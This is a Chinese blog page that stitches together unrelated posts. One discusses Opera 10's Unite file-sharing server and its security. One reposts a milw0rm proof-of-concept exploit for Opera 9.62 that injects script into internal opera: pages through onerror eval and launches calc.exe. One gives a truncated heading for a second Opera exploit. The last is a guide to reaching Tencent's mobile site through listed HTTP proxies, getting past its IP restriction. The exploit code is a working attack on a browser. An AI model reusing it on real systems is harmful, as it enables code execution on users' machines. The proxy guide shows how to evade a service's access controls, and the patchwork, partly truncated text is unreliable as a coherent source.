Chinadu's Blog

据说Opera 10可以让普通用户在自己的PC上搭一个简易的文件服务器，以此来分享自己的文件。在Web2.0横行的年代，这似乎是个绝妙的主意。Opera近期宣布，将在其版本10捆绑一个非常易用的Web服务器——Unite。如此，它便可以提供文件共享功能了。这听起来很不错，而且也正成为 Opera未来与IE8、Firefox 3.5等新版本浏览器展开竞争的法宝。但在安全性方面，似乎还不那么经得起推敲。

尽管Unite已经能够支持Linux、MacOS X和Windows等多种操作系统，但它目前毕竟还是alpha版的。

Unite是什么？

内置Unite的Opera能做什么呢？说起来还是很令人振奋的：理论上讲，你可以向世界上任何地方的人共享你的个人电脑上的文件——照片、MP3等等。另外，你甚至还可以通过一些小程序设立自己的实时聊天室或论坛。这样一来，一个普通的、不具备任何专业IT技能的用户，也可以轻松地“架设自己的、基于 PC的文件服务器和聊天室、论坛”。在Web2.0横行的年代，这似乎是个绝妙的主意。

它们是如何做到的？

Unite即可以作为浏览器，也可以用作Web服务器。通过内置的JavaScript applet，可以很容易地设置文件共享或架设一些在线服务，如论坛。实际上，用户并不是直接连接到你的PC上。他们会被“挂”到Opera的代理服务器上，然后访问你提供的共享文件。

要提供和保持文件共享功能，你的PC必须时刻保持8840端口打开。要让别人能“访问”你，还得通知他们你的Unite URL。这个URL由你PC的名字、你的Opera用户名，以及你的Unite服务名组成，另外，还有你设置的密码。如：
阅读全文...

Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>


# milw0rm.com [2008-10-30]

Opera 9.61 opera:historysearch Code Execution Exploit PoC

<!--
--Aviv.

# milw0rm.com [2008-10-30]


现在介绍的技术，是用软件Opera+代理来登陆手机腾讯网。OPERA大家都不陌生，它可以登陆一些WAP网站，比如百度等等。但是如果要登陆手机腾讯网，就需要代理了，因为手机腾讯网限制了非手机IP的登陆。

具体步骤：
1.下载OPERA多国语言版版，安装。下载地址

点击下载：迅雷下载

如果大家不放心，可以自己去搜索下载，这个链接是霏凡软件站提供的。

2.安装OPERA后，进行设置。

点击工具---首选项-----高级------网络，之后会出“现代理服务器”和“服务器名称补全”。

点击 代理服务器，在HTTP前打勾，填写IP：211.95.176.6 端口填写：808 ，之后在为 代理启用HTTP1.1 前打勾，点确定。
应广大朋友要求，本人再增加几个代理IP，如果发现上述IP不能使用，可以更换以下IP：

IP：218.201.40.117 端口：808 代理类型：HTTP
IP：211.140.192.186 端口：8080 代理类型：HTTP
IP：218.204.126.130 端口：80 代理类型：HTTP

之后退回服务器名称补全，在 前缀 栏填写为 www,wap .点确定。

设置完成。

点亮手机腾讯网图标：
最后在OPERA浏览器地址栏中输入:

http://q11.3g.qq.com/g/s?sid=oMQjojRIoy+XmdFJoYat3g==s&


就可以进入手机腾讯网了！

注意：在地址栏中输入 3G.QQ.COM或WAP.QQ.COM是不行的，需要输入上述地址！

我把步骤发出来（其实很简单）只要把下面2步弄好就 OK了，看图:


点亮WAPQQ图标：

在地址填写：

http://idc7.wap.sjkx.com/unicom/bjGqqzone.jsp


在地址填写选择"QQ聊天"登陆进去就点亮了

很多朋友反映说不成功，经过本人2008年11月14日再次测试，成功点亮，效果如下图：

很多朋友说不成功，看这个2008年11月18日14点43分的最新截图:

如果这个方法真的失效了，它的存在也就无意义了，我会删掉...